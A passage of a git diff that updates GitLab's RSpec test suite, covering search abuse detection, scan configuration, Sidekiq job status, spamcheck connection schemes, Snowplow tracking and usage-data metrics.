described_class.new(params, detect_abuse: detect_abuse) } + + let(:search) { 'search' } + let(:group_id) { 123 } + let(:params) { { group_id: 123, search: search } } + let(:detect_abuse) { true } + + describe 'detect_abuse conditional' do + it 'does not call AbuseDetection' do + expect(Gitlab::Search::AbuseDetection).not_to receive(:new) + described_class.new(params, detect_abuse: false) + end + + it 'uses AbuseDetection by default' do + expect(Gitlab::Search::AbuseDetection).to receive(:new).and_call_original + described_class.new(params) + end + end + + describe '#[]' do + it 'feels like regular params' do + expect(subject[:group_id]).to eq(params[:group_id]) + end + + it 'has indifferent access' do + params = described_class.new({ 'search' => search, group_id: group_id }) + expect(params['group_id']).to eq(group_id) + expect(params[:search]).to eq(search) + end + + it 'also works on attr_reader attributes' do + expect(subject[:query_string]).to eq(subject.query_string) + end + end + + describe '#query_string' do + let(:term) { 'term' } + + it "uses 'search' parameter" do + params = described_class.new({ search: search }) + expect(params.query_string).to eq(search) + end + + it "uses 'term' parameter" do + params = described_class.new({ term: term }) + expect(params.query_string).to eq(term) + end + + it "prioritizes 'search' over 'term'" do + params = described_class.new({ search: search, term: term }) + expect(params.query_string).to eq(search) + end + + it 'strips surrounding whitespace from query string' do + params = described_class.new({ search: ' ' + search + ' ' }) + expect(params.query_string).to eq(search) + end + end + + describe '#validate' do + context 'when detect_abuse is disabled' do + let(:detect_abuse) { false } + + it 'does NOT validate AbuseDetector' do + expect(Gitlab::Search::AbuseDetection).not_to receive(:new) + subject.validate + end + end + + it 'validates AbuseDetector on validation' do + expect(Gitlab::Search::AbuseDetection).to receive(:new).and_call_original + subject.validate + end + end + + describe '#valid?' do + context 'when detect_abuse is disabled' do + let(:detect_abuse) { false } + + it 'does NOT validate AbuseDetector' do + expect(Gitlab::Search::AbuseDetection).not_to receive(:new) + subject.valid? + end + end + + it 'validates AbuseDetector on validation' do + expect(Gitlab::Search::AbuseDetection).to receive(:new).and_call_original + subject.valid? + end + end + + describe 'abuse detection' do + let(:abuse_detection) { instance_double(Gitlab::Search::AbuseDetection) } + + before do + allow(subject).to receive(:abuse_detection).and_return abuse_detection + allow(abuse_detection).to receive(:errors).and_return abuse_errors + end + + context 'when there are abuse validation errors' do + let(:abuse_errors) { { foo: ['bar'] } } + + it 'is considered abusive' do + expect(subject).to be_abusive + end + end + + context 'when there are NOT any abuse validation errors' do + let(:abuse_errors) { {} } + + context 'and there are other validation errors' do + it 'is NOT considered abusive' do + allow(subject).to receive(:valid?) do + subject.errors.add :project_id, 'validation error unrelated to abuse' + false + end + + expect(subject).not_to be_abusive + end + end + + context 'and there are NO other validation errors' do + it 'is NOT considered abusive' do + allow(subject).to receive(:valid?).and_return(true) + + expect(subject).not_to be_abusive + end + end + end + end +end diff --git a/spec/lib/gitlab/security/scan_configuration_spec.rb b/spec/lib/gitlab/security/scan_configuration_spec.rb new file mode 100644 index 00000000000..0af029968e8 --- /dev/null +++ b/spec/lib/gitlab/security/scan_configuration_spec.rb @@ -0,0 +1,64 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe ::Gitlab::Security::ScanConfiguration do + let_it_be(:project) { create(:project, :repository) } + + let(:scan) { described_class.new(project: project, type: type, configured: configured) } + + describe '#available?' do + subject { scan.available? } + + let(:configured) { true } + + context 'with a core scanner' do + let(:type) { :sast } + + it { is_expected.to be_truthy } + end + + context 'with custom scanner' do + let(:type) { :my_scanner } + + it { is_expected.to be_falsey } + end + end + + describe '#configured?' do + subject { scan.configured? } + + let(:type) { :sast } + let(:configured) { false } + + it { is_expected.to be_falsey } + end + + describe '#configuration_path' do + subject { scan.configuration_path } + + let(:configured) { true } + + context 'with a non configurable scanner' do + let(:type) { :secret_detection } + + it { is_expected.to be_nil } + end + + context 'with licensed scanner for FOSS environment' do + let(:type) { :dast } + + before do + stub_env('FOSS_ONLY', '1') + end + + it { is_expected.to be_nil } + end + + context 'with custom scanner' do + let(:type) { :my_scanner } + + it { is_expected.to be_nil } + end + end +end diff --git a/spec/lib/gitlab/sidekiq_enq_spec.rb b/spec/lib/gitlab/sidekiq_enq_spec.rb deleted file mode 100644 index 6903f01bf5f..00000000000 --- a/spec/lib/gitlab/sidekiq_enq_spec.rb +++ /dev/null @@ -1,93 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::SidekiqEnq, :clean_gitlab_redis_queues do - let(:retry_set) { Sidekiq::Scheduled::SETS.first } - let(:schedule_set) { Sidekiq::Scheduled::SETS.last } - - around do |example| - freeze_time { example.run } - end - - shared_examples 'finds jobs that are due and enqueues them' do - before do - Sidekiq.redis do |redis| - redis.zadd(retry_set, (Time.current - 1.day).to_f.to_s, '{"jid": 1}') - redis.zadd(retry_set, Time.current.to_f.to_s, '{"jid": 2}') - redis.zadd(retry_set, (Time.current + 1.day).to_f.to_s, '{"jid": 3}') - - redis.zadd(schedule_set, (Time.current - 1.day).to_f.to_s, '{"jid": 4}') - redis.zadd(schedule_set, Time.current.to_f.to_s, '{"jid": 5}') - redis.zadd(schedule_set, (Time.current + 1.day).to_f.to_s, '{"jid": 6}') - end - end - - it 'enqueues jobs that are due' do - expect(Sidekiq::Client).to receive(:push).with({ 'jid' => 1 }) - expect(Sidekiq::Client).to receive(:push).with({ 'jid' => 2 }) - expect(Sidekiq::Client).to receive(:push).with({ 'jid' => 4 }) - expect(Sidekiq::Client).to receive(:push).with({ 'jid' => 5 }) - - Gitlab::SidekiqEnq.new.enqueue_jobs - - Sidekiq.redis do |redis| - expect(redis.zscan_each(retry_set).map(&:first)).to contain_exactly('{"jid": 3}') - expect(redis.zscan_each(schedule_set).map(&:first)).to contain_exactly('{"jid": 6}') - end - end - end - - context 'when atomic_sidekiq_scheduler is disabled' do - before do - stub_feature_flags(atomic_sidekiq_scheduler: false) - end - - it_behaves_like 'finds jobs that are due and enqueues them' - - context 'when ZRANGEBYSCORE returns a job that is already removed by another process' do - before do - Sidekiq.redis do |redis| - redis.zadd(schedule_set, Time.current.to_f.to_s, '{"jid": 1}') - - allow(redis).to receive(:zrangebyscore).and_wrap_original do |m, *args, **kwargs| - m.call(*args, **kwargs).tap do |jobs| - redis.zrem(schedule_set, jobs.first) if args[0] == schedule_set && jobs.first - end - end - end - end - - it 'calls ZREM but does not enqueue the job' do - Sidekiq.redis do |redis| - expect(redis).to receive(:zrem).with(schedule_set, '{"jid": 1}').twice.and_call_original - end - expect(Sidekiq::Client).not_to receive(:push) - - Gitlab::SidekiqEnq.new.enqueue_jobs - end - end - end - - context 'when atomic_sidekiq_scheduler is enabled' do - before do - stub_feature_flags(atomic_sidekiq_scheduler: true) - end - - context 'when Lua script is not yet loaded' do - before do - Gitlab::Redis::Queues.with { |redis| redis.script(:flush) } - end - - it_behaves_like 'finds jobs that are due and enqueues them' - end - - context 'when Lua script is already loaded' do - before do - Gitlab::SidekiqEnq.new.enqueue_jobs - end - - it_behaves_like 'finds jobs that are due and enqueues them' - end - end -end diff --git a/spec/lib/gitlab/sidekiq_logging/structured_logger_spec.rb b/spec/lib/gitlab/sidekiq_logging/structured_logger_spec.rb index d801b84775b..210b9162be0 100644 --- a/spec/lib/gitlab/sidekiq_logging/structured_logger_spec.rb +++ b/spec/lib/gitlab/sidekiq_logging/structured_logger_spec.rb @@ -272,12 +272,12 @@ RSpec.describe Gitlab::SidekiqLogging::StructuredLogger do expected_end_payload.merge( 'db_duration_s' => a_value >= 0.1, 'db_count' => a_value >= 1, - "db_replica_#{db_config_name}_count" => 0, + "db_#{db_config_name}_replica_count" => 0, 'db_replica_duration_s' => a_value >= 0, 'db_primary_count' => a_value >= 1, - "db_primary_#{db_config_name}_count" => a_value >= 1, + "db_#{db_config_name}_count" => a_value >= 1, 'db_primary_duration_s' => a_value > 0, - "db_primary_#{db_config_name}_duration_s" => a_value > 0 + "db_#{db_config_name}_duration_s" => a_value > 0 ) end diff --git a/spec/lib/gitlab/sidekiq_middleware/server_metrics_spec.rb b/spec/lib/gitlab/sidekiq_middleware/server_metrics_spec.rb index 914f5a30c3a..3fbd207c2e1 100644 --- a/spec/lib/gitlab/sidekiq_middleware/server_metrics_spec.rb +++ b/spec/lib/gitlab/sidekiq_middleware/server_metrics_spec.rb @@ -239,6 +239,8 @@ RSpec.describe Gitlab::SidekiqMiddleware::ServerMetrics do shared_context 'worker declaring data consistency' do let(:worker_class) { LBTestWorker } + let(:wal_locations) { { Gitlab::Database::MAIN_DATABASE_NAME.to_sym => 'AB/12345' } } + let(:job) { { "retry" => 3, "job_id" => "a180b47c-3fd6-41b8-81e9-34da61c3400e", "wal_locations" => wal_locations } } before do stub_const('LBTestWorker', Class.new(TestWorker)) diff --git a/spec/lib/gitlab/sidekiq_status/client_middleware_spec.rb b/spec/lib/gitlab/sidekiq_status/client_middleware_spec.rb index 0cf05fb0a5c..2f2499753b9 100644 --- a/spec/lib/gitlab/sidekiq_status/client_middleware_spec.rb +++ b/spec/lib/gitlab/sidekiq_status/client_middleware_spec.rb @@ -1,14 +1,25 @@ # frozen_string_literal: true -require 'spec_helper' +require 'fast_spec_helper' RSpec.describe Gitlab::SidekiqStatus::ClientMiddleware do describe '#call' do - it 'tracks the job in Redis' do - expect(Gitlab::SidekiqStatus).to receive(:set).with('123', Gitlab::SidekiqStatus::DEFAULT_EXPIRATION) + context 'when the job has status_expiration set' do + it 'tracks the job in Redis with a value of 2' do + expect(Gitlab::SidekiqStatus).to receive(:set).with('123', 1.hour.to_i, value: 2) - described_class.new - .call('Foo', { 'jid' => '123' }, double(:queue), double(:pool)) { nil } + described_class.new + .call('Foo', { 'jid' => '123', 'status_expiration' => 1.hour.to_i }, double(:queue), double(:pool)) { nil } + end + end + + context 'when the job does not have status_expiration set' do + it 'tracks the job in Redis with a value of 1' do + expect(Gitlab::SidekiqStatus).to receive(:set).with('123', Gitlab::SidekiqStatus::DEFAULT_EXPIRATION, value: 1) + + described_class.new + .call('Foo', { 'jid' => '123' }, double(:queue), double(:pool)) { nil } + end end end end diff --git a/spec/lib/gitlab/sidekiq_status_spec.rb b/spec/lib/gitlab/sidekiq_status_spec.rb index fc2ac29a1f9..1e7b52471b0 100644 --- a/spec/lib/gitlab/sidekiq_status_spec.rb +++ b/spec/lib/gitlab/sidekiq_status_spec.rb @@ -12,6 +12,31 @@ RSpec.describe Gitlab::SidekiqStatus, :clean_gitlab_redis_queues, :clean_gitlab_ Sidekiq.redis do |redis| expect(redis.exists(key)).to eq(true) expect(redis.ttl(key) > 0).to eq(true) + expect(redis.get(key)).to eq(described_class::DEFAULT_VALUE.to_s) + end + end + + it 'allows overriding the expiration time' do + described_class.set('123', described_class::DEFAULT_EXPIRATION * 2) + + key = described_class.key_for('123') + + Sidekiq.redis do |redis| + expect(redis.exists(key)).to eq(true) + expect(redis.ttl(key) > described_class::DEFAULT_EXPIRATION).to eq(true) + expect(redis.get(key)).to eq(described_class::DEFAULT_VALUE.to_s) + end + end + + it 'allows overriding the default value' do + described_class.set('123', value: 2) + + key = described_class.key_for('123') + + Sidekiq.redis do |redis| + expect(redis.exists(key)).to eq(true) + expect(redis.ttl(key) > 0).to eq(true) + expect(redis.get(key)).to eq('2') end end end @@ -88,7 +113,7 @@ RSpec.describe Gitlab::SidekiqStatus, :clean_gitlab_redis_queues, :clean_gitlab_ end end - describe 'completed' do + describe '.completed_jids' do it 'returns the completed job' do expect(described_class.completed_jids(%w(123))).to eq(['123']) end @@ -100,4 +125,46 @@ RSpec.describe Gitlab::SidekiqStatus, :clean_gitlab_redis_queues, :clean_gitlab_ expect(described_class.completed_jids(%w(123 456 789))).to eq(['789']) end end + + describe '.job_status' do + it 'returns an array of boolean values' do + described_class.set('123') + described_class.set('456') + described_class.unset('123') + + expect(described_class.job_status(%w(123 456 789))).to eq([false, true, false]) + end + + it 'handles an empty array' do + expect(described_class.job_status([])).to eq([]) + end + + context 'when log_implicit_sidekiq_status_calls is enabled' do + it 'logs keys that contained the default value' do + described_class.set('123', value: 2) + described_class.set('456') + described_class.set('012') + + expect(Sidekiq.logger).to receive(:info).with(message: described_class::DEFAULT_VALUE_MESSAGE, + keys: [described_class.key_for('456'), described_class.key_for('012')]) + + expect(described_class.job_status(%w(123 456 789 012))).to eq([true, true, false, true]) + end + end + + context 'when log_implicit_sidekiq_status_calls is disabled' do + before do + stub_feature_flags(log_implicit_sidekiq_status_calls: false) + end + + it 'does not perform any logging' do + described_class.set('123', value: 2) + described_class.set('456') + + expect(Sidekiq.logger).not_to receive(:info) + + expect(described_class.job_status(%w(123 456 789))).to eq([true, true, false]) + end + end + end end diff --git a/spec/lib/gitlab/spamcheck/client_spec.rb b/spec/lib/gitlab/spamcheck/client_spec.rb index e542ce455bb..a6e7665569c 100644 --- a/spec/lib/gitlab/spamcheck/client_spec.rb +++ b/spec/lib/gitlab/spamcheck/client_spec.rb @@ -32,6 +32,30 @@ RSpec.describe Gitlab::Spamcheck::Client do stub_application_setting(spam_check_endpoint_url: endpoint) end + describe 'url scheme' do + let(:stub) { double(:spamcheck_stub, check_for_spam_issue: response) } + + context 'is tls ' do + let(:endpoint) { 'tls://spamcheck.example.com'} + + it 'uses secure connection' do + expect(Spamcheck::SpamcheckService::Stub).to receive(:new).with(endpoint.sub(%r{^tls://}, ''), + instance_of(GRPC::Core::ChannelCredentials), + anything).and_return(stub) + subject + end + end + + context 'is grpc' do + it 'uses insecure connection' do + expect(Spamcheck::SpamcheckService::Stub).to receive(:new).with(endpoint.sub(%r{^grpc://}, ''), + :this_channel_is_insecure, + anything).and_return(stub) + subject + end + end + end + describe '#issue_spam?' do before do allow_next_instance_of(::Spamcheck::SpamcheckService::Stub) do |instance| diff --git a/spec/lib/gitlab/subscription_portal_spec.rb b/spec/lib/gitlab/subscription_portal_spec.rb index 4be1c85f7c8..627d3bb42c7 100644 --- a/spec/lib/gitlab/subscription_portal_spec.rb +++ b/spec/lib/gitlab/subscription_portal_spec.rb @@ -56,6 +56,7 @@ RSpec.describe ::Gitlab::SubscriptionPortal do where(:method_name, :result) do :default_subscriptions_url | 'https://customers.staging.gitlab.com' :payment_form_url | 'https://customers.staging.gitlab.com/payment_forms/cc_validation' + :registration_validation_form_url | 'https://customers.staging.gitlab.com/payment_forms/cc_registration_validation' :subscriptions_graphql_url | 'https://customers.staging.gitlab.com/graphql' :subscriptions_more_minutes_url | 'https://customers.staging.gitlab.com/buy_pipeline_minutes' :subscriptions_more_storage_url | 'https://customers.staging.gitlab.com/buy_storage' @@ -63,6 +64,7 @@ RSpec.describe ::Gitlab::SubscriptionPortal do :subscriptions_plans_url | 'https://about.gitlab.com/pricing/' :subscriptions_instance_review_url | 'https://customers.staging.gitlab.com/instance_review' :subscriptions_gitlab_plans_url | 'https://customers.staging.gitlab.com/gitlab_plans' + :edit_account_url | 'https://customers.staging.gitlab.com/customers/edit' end with_them do diff --git a/spec/lib/gitlab/tracking/destinations/snowplow_micro_spec.rb b/spec/lib/gitlab/tracking/destinations/snowplow_micro_spec.rb index 6004698d092..2b94eaa2db9 100644 --- a/spec/lib/gitlab/tracking/destinations/snowplow_micro_spec.rb +++ b/spec/lib/gitlab/tracking/destinations/snowplow_micro_spec.rb @@ -48,4 +48,24 @@ RSpec.describe Gitlab::Tracking::Destinations::SnowplowMicro do end end end + + describe '#options' do + let_it_be(:group) { create :group } + + before do + stub_env('SNOWPLOW_MICRO_URI', 'http://gdk.test:9091') + end + + it 'includes protocol with the correct value' do + expect(subject.options(group)[:protocol]).to eq 'http' + end + + it 'includes port with the correct value' do + expect(subject.options(group)[:port]).to eq 9091 + end + + it 'includes forceSecureTracker with value false' do + expect(subject.options(group)[:forceSecureTracker]).to eq false + end + end end diff --git a/spec/lib/gitlab/tracking/destinations/snowplow_spec.rb b/spec/lib/gitlab/tracking/destinations/snowplow_spec.rb index f8e73a807c6..06cc2d3800c 100644 --- a/spec/lib/gitlab/tracking/destinations/snowplow_spec.rb +++ b/spec/lib/gitlab/tracking/destinations/snowplow_spec.rb @@ -29,7 +29,7 @@ RSpec.describe Gitlab::Tracking::Destinations::Snowplow do expect(SnowplowTracker::Tracker) .to receive(:new) - .with(emitter, an_instance_of(SnowplowTracker::Subject), Gitlab::Tracking::SNOWPLOW_NAMESPACE, '_abc123_') + .with(emitter, an_instance_of(SnowplowTracker::Subject), described_class::SNOWPLOW_NAMESPACE, '_abc123_') .and_return(tracker) end diff --git a/spec/lib/gitlab/tracking_spec.rb b/spec/lib/gitlab/tracking_spec.rb index 61b2c89ffa1..cd83971aef9 100644 --- a/spec/lib/gitlab/tracking_spec.rb +++ b/spec/lib/gitlab/tracking_spec.rb @@ -13,6 +13,10 @@ RSpec.describe Gitlab::Tracking do described_class.instance_variable_set("@snowplow", nil) end + after do + described_class.instance_variable_set("@snowplow", nil) + end + describe '.options' do shared_examples 'delegates to destination' do |klass| before do @@ -63,7 +67,7 @@ RSpec.describe Gitlab::Tracking do appId: '_abc123_', protocol: 'http', port: 9090, - force_secure_tracker: false, + forceSecureTracker: false, formTracking: true, linkClickTracking: true } diff --git a/spec/lib/gitlab/usage/metrics/aggregates/sources/postgres_hll_spec.rb b/spec/lib/gitlab/usage/metrics/aggregates/sources/postgres_hll_spec.rb index 1ae4c9414dd..59b944ac398 100644 --- a/spec/lib/gitlab/usage/metrics/aggregates/sources/postgres_hll_spec.rb +++ b/spec/lib/gitlab/usage/metrics/aggregates/sources/postgres_hll_spec.rb @@ -11,6 +11,7 @@ RSpec.describe Gitlab::Usage::Metrics::Aggregates::Sources::PostgresHll, :clean_ let(:metric_1) { 'metric_1' } let(:metric_2) { 'metric_2' } let(:metric_names) { [metric_1, metric_2] } + let(:error_rate) { Gitlab::Database::PostgresHll::BatchDistinctCounter::ERROR_RATE } describe 'metric calculations' do before do @@ -38,7 +39,7 @@ RSpec.describe Gitlab::Usage::Metrics::Aggregates::Sources::PostgresHll, :clean_ end it 'returns the number of unique events in the union of all metrics' do - expect(calculate_metrics_union.round(2)).to eq(3.12) + expect(calculate_metrics_union.round(2)).to be_within(error_rate).percent_of(3) end context 'when there is no aggregated data saved' do @@ -53,7 +54,7 @@ RSpec.describe Gitlab::Usage::Metrics::Aggregates::Sources::PostgresHll, :clean_ let(:metric_names) { [metric_1] } it 'returns the number of unique events for that metric' do - expect(calculate_metrics_union.round(2)).to eq(2.08) + expect(calculate_metrics_union.round(2)).to be_within(error_rate).percent_of(2) end end end @@ -64,7 +65,7 @@ RSpec.describe Gitlab::Usage::Metrics::Aggregates::Sources::PostgresHll, :clean_ end it 'returns the number of common events in the intersection of all metrics' do - expect(calculate_metrics_intersections.round(2)).to eq(1.04) + expect(calculate_metrics_intersections.round(2)).to be_within(error_rate).percent_of(1) end context 'when there is no aggregated data saved' do @@ -79,7 +80,7 @@ RSpec.describe Gitlab::Usage::Metrics::Aggregates::Sources::PostgresHll, :clean_ let(:metric_names) { [metric_1] } it 'returns the number of common/unique events for the intersection of that metric' do - expect(calculate_metrics_intersections.round(2)).to eq(2.08) + expect(calculate_metrics_intersections.round(2)).to be_within(error_rate).percent_of(2) end end end diff --git a/spec/lib/gitlab/usage/metrics/instrumentations/snowplow_configured_to_gitlab_collector_metric_spec.rb b/spec/lib/gitlab/usage/metrics/instrumentations/snowplow_configured_to_gitlab_collector_metric_spec.rb new file mode 100644 index 00000000000..c9bc101374f --- /dev/null +++ b/spec/lib/gitlab/usage/metrics/instrumentations/snowplow_configured_to_gitlab_collector_metric_spec.rb @@ -0,0 +1,22 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Usage::Metrics::Instrumentations::SnowplowConfiguredToGitlabCollectorMetric do + using RSpec::Parameterized::TableSyntax + + context 'for collector_hostname option' do + where(:collector_hostname, :expected_value) do + 'snowplow.trx.gitlab.net' | true + 'foo.bar.something.net' | false + end + + with_them do + before do + stub_application_setting(snowplow_collector_hostname: collector_hostname) + end + + it_behaves_like 'a correct instrumented metric value', { time_frame: 'none' } + end + end +end diff --git a/spec/lib/gitlab/usage/metrics/instrumentations/snowplow_enabled_metric_spec.rb b/spec/lib/gitlab/usage/metrics/instrumentations/snowplow_enabled_metric_spec.rb new file mode 100644 index 00000000000..1e0cdd650fa --- /dev/null +++ b/spec/lib/gitlab/usage/metrics/instrumentations/snowplow_enabled_metric_spec.rb @@ -0,0 +1,22 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Usage::Metrics::Instrumentations::SnowplowEnabledMetric do + using RSpec::Parameterized::TableSyntax + + context 'for snowplow enabled option' do + where(:snowplow_enabled, :expected_value) do + true | true + false | false + end + + with_them do + before do + stub_application_setting(snowplow_enabled: snowplow_enabled) + end + + it_behaves_like 'a correct instrumented metric value', { time_frame: 'none' } + end + end +end diff --git a/spec/lib/gitlab/usage/metrics/names_suggestions/generator_spec.rb b/spec/lib/gitlab/usage/metrics/names_suggestions/generator_spec.rb index dbbc718e147..0f95da74ff9 100644 --- a/spec/lib/gitlab/usage/metrics/names_suggestions/generator_spec.rb +++ b/spec/lib/gitlab/usage/metrics/names_suggestions/generator_spec.rb @@ -25,30 +25,10 @@ RSpec.describe Gitlab::Usage::Metrics::NamesSuggestions::Generator do end context 'for count with default column metrics' do - context 'with usage_data_instrumentation feature flag' do - context 'when enabled' do - before do - stub_feature_flags(usage_data_instrumentation: true) - end - - it_behaves_like 'name suggestion' do - # corresponding metric is collected with ::Gitlab::UsageDataMetrics.suggested_names - let(:key_path) { 'counts.boards' } - let(:name_suggestion) { /count_boards/ } - end - end - - context 'when disabled' do - before do - stub_feature_flags(usage_data_instrumentation: false) - end - - it_behaves_like 'name suggestion' do - # corresponding metric is collected with count(Board) - let(:key_path) { 'counts.boards' } - let(:name_suggestion) { /count_boards/ } - end - end + it_behaves_like 'name suggestion' do + # corresponding metric is collected with count(Board) + let(:key_path) { 'counts.boards' } + let(:name_suggestion) { /count_boards/ } end end diff --git a/spec/lib/gitlab/usage_data_spec.rb b/spec/lib/gitlab/usage_data_spec.rb index cf544c07195..015ecd1671e 100644 --- a/spec/lib/gitlab/usage_data_spec.rb +++ b/spec/lib/gitlab/usage_data_spec.rb @@ -80,12 +80,6 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do end end end - - it 'allows indifferent access' do - allow(::Gitlab::UsageDataCounters::HLLRedisCounter).to receive(:unique_events).and_return(1) - expect(subject[:search_unique_visits][:search_unique_visits_for_any_target_monthly]).to eq(1) - expect(subject[:search_unique_visits]['search_unique_visits_for_any_target_monthly']).to eq(1) - end end describe 'usage_activity_by_stage_package' do @@ -205,7 +199,6 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do for_defined_days_back do user = create(:user) user2 = create(:user) - create(:event, author: user) create(:group_member, user: user) create(:authentication_event, user: user, provider: :ldapmain, result: :success) create(:authentication_event, user: user2, provider: :ldapsecondary, result: :success) @@ -214,17 +207,24 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do create(:authentication_event, user: user, provider: :group_saml, result: :failed) end + for_defined_days_back(days: [31, 29, 3]) do + create(:event) + end + + stub_const('Gitlab::Database::PostgresHll::BatchDistinctCounter::DEFAULT_BATCH_SIZE', 1) + stub_const('Gitlab::Database::PostgresHll::BatchDistinctCounter::MIN_REQUIRED_BATCH_SIZE', 0) + expect(described_class.usage_activity_by_stage_manage({})).to include( events: -1, groups: 2, - users_created: 6, + users_created: 10, omniauth_providers: ['google_oauth2'], user_auth_by_provider: { 'group_saml' => 2, 'ldap' => 4, 'standard' => 0, 'two-factor' => 0, 'two-factor-via-u2f-device' => 0, "two-factor-via-webauthn-device" => 0 } ) expect(described_class.usage_activity_by_stage_manage(described_class.monthly_time_range_db_params)).to include( - events: be_within(error_rate).percent_of(1), + events: be_within(error_rate).percent_of(2), groups: 1, - users_created: 3, + users_created: 6, omniauth_providers: ['google_oauth2'], user_auth_by_provider: { 'group_saml' => 1, 'ldap' => 2, 'standard' => 0, 'two-factor' => 0, 'two-factor-via-u2f-device' => 0, "two-factor-via-webauthn-device" => 0 } ) @@ -457,42 +457,16 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do ) end - context 'with usage_data_instrumentation feature flag' do - context 'when enabled' do - it 'merges the data from instrumentation classes' do - stub_feature_flags(usage_data_instrumentation: true) - - for_defined_days_back do - user = create(:user) - project = create(:project, creator: user) - create(:issue, project: project, author: user) - create(:issue, project: project, author: User.support_bot) - end - - expect(described_class.usage_activity_by_stage_plan({})).to include(issues: Gitlab::Utils::UsageData::INSTRUMENTATION_CLASS_FALLBACK) - expect(described_class.usage_activity_by_stage_plan(described_class.monthly_time_range_db_params)).to include(issues: Gitlab::Utils::UsageData::INSTRUMENTATION_CLASS_FALLBACK) - - uncached_data = described_class.uncached_data - expect(uncached_data[:usage_activity_by_stage][:plan]).to include(issues: 3) - expect(uncached_data[:usage_activity_by_stage_monthly][:plan]).to include(issues: 2) - end + it 'does not merge the data from instrumentation classes' do + for_defined_days_back do + user = create(:user) + project = create(:project, creator: user) + create(:issue, project: project, author: user) + create(:issue, project: project, author: User.support_bot) end - context 'when disabled' do - it 'does not merge the data from instrumentation classes' do - stub_feature_flags(usage_data_instrumentation: false) - - for_defined_days_back do - user = create(:user) - project = create(:project, creator: user) - create(:issue, project: project, author: user) - create(:issue, project: project, author: User.support_bot) - end - - expect(described_class.usage_activity_by_stage_plan({})).to include(issues: 3) - expect(described_class.usage_activity_by_stage_plan(described_class.monthly_time_range_db_params)).to include(issues: 2) - end - end + expect(described_class.usage_activity_by_stage_plan({})).to include(issues: 3) + expect(described_class.usage_activity_by_stage_plan(described_class.monthly_time_range_db_params)).to include(issues: 2) end end @@ -510,53 +484,17 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do deployments: 2, failed_deployments: 2, releases: 2, - successful_deployments: 2 + successful_deployments: 2, + releases_with_milestones: 2 ) expect(described_class.usage_activity_by_stage_release(described_class.monthly_time_range_db_params)).to include( deployments: 1, failed_deployments: 1, releases: 1, - successful_deployments: 1 + successful_deployments: 1, + releases_with_milestones: 1 ) end - - context 'with usage_data_instrumentation feature flag' do - before do - for_defined_days_back do - user = create(:user) - create(:deployment, :failed, user: user) - release = create(:release, author: user) - create(:milestone, project: release.project, releases: [release]) - create(:deployment, :success, user: user) - end - end - - context 'when enabled' do - before do - stub_feature_flags(usage_data_instrumentation: true) - end - - it 'merges data from instrumentation classes' do - expect(described_class.usage_activity_by_stage_release({})).to include(releases_with_milestones: Gitlab::Utils::UsageData::INSTRUMENTATION_CLASS_FALLBACK) - expect(described_class.usage_activity_by_stage_release(described_class.monthly_time_range_db_params)).to include(releases_with_milestones: Gitlab::Utils::UsageData::INSTRUMENTATION_CLASS_FALLBACK) - - uncached_data = described_class.uncached_data - expect(uncached_data[:usage_activity_by_stage][:release]).to include(releases_with_milestones: 2) - expect(uncached_data[:usage_activity_by_stage_monthly][:release]).to include(releases_with_milestones: 1) - end - end - - context 'when disabled' do - before do - stub_feature_flags(usage_data_instrumentation: false) - end - - it 'does not merge data from instrumentation classes' do - expect(described_class.usage_activity_by_stage_release({})).to include(releases_with_milestones: 2) - expect(described_class.usage_activity_by_stage_release(described_class.monthly_time_range_db_params)).to include(releases_with_milestones: 1) - end - end - end end describe 'usage_activity_by_stage_verify' do @@ -605,16 +543,15 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do subject { described_class.data } it 'gathers usage data' do - expect(subject.keys).to include(*UsageDataHelpers::USAGE_DATA_KEYS.map(&:to_s)) + expect(subject.keys).to include(*UsageDataHelpers::USAGE_DATA_KEYS) end it 'gathers usage counts', :aggregate_failures do count_data = subject[:counts] expect(count_data[:boards]).to eq(1) expect(count_data[:projects]).to eq(4) - count_keys = UsageDataHelpers::COUNTS_KEYS.map(&:to_s) - expect(count_data.keys).to include(*count_keys) - expect(count_keys - count_data.keys).to be_empty + expect(count_data.keys).to include(*UsageDataHelpers::COUNTS_KEYS) + expect(UsageDataHelpers::COUNTS_KEYS - count_data.keys).to be_empty expect(count_data.values).to all(be_a_kind_of(Integer)) end @@ -699,7 +636,7 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do external_diffs: { enabled: false }, lfs: { enabled: true, object_store: { enabled: false, direct_upload: true, background_upload: false, provider: "AWS" } }, uploads: { enabled: nil, object_store: { enabled: false, direct_upload: true, background_upload: false, provider: "AWS" } }, - packages: { enabled: true, object_store: { enabled: false, direct_upload: false, background_upload: true, provider: "AWS" } } }.with_indifferent_access + packages: { enabled: true, object_store: { enabled: false, direct_upload: false, background_upload: true, provider: "AWS" } } } ) end @@ -747,23 +684,50 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do end end - it 'works when queries time out' do - allow_any_instance_of(ActiveRecord::Relation) - .to receive(:count).and_raise(ActiveRecord::StatementInvalid.new('')) + context 'when queries time out' do + let(:metric_method) { :count } + + before do + allow_any_instance_of(ActiveRecord::Relation).to receive(metric_method).and_raise(ActiveRecord::StatementInvalid) + allow(Gitlab::ErrorTracking).to receive(:should_raise_for_dev?).and_return(should_raise_for_dev) + end + + context 'with should_raise_for_dev? true' do + let(:should_raise_for_dev) { true } + + it 'raises an error' do + expect { subject }.to raise_error(ActiveRecord::StatementInvalid) + end + + context 'when metric calls find_in_batches' do + let(:metric_method) { :find_in_batches } + + it 'raises an error for jira_usage' do + expect { described_class.jira_usage }.to raise_error(ActiveRecord::StatementInvalid) + end + end + end + + context 'with should_raise_for_dev? false' do + let(:should_raise_for_dev) { false } + + it 'does not raise an error' do + expect { subject }.not_to raise_error + end - expect { subject }.not_to raise_error + context 'when metric calls find_in_batches' do + let(:metric_method) { :find_in_batches } + + it 'does not raise an error for jira_usage' do + expect { described_class.jira_usage }.not_to raise_error + end + end + end end it 'includes a recording_ce_finished_at timestamp' do expect(subject[:recording_ce_finished_at]).to be_a(Time) end - - it 'jira usage works when queries 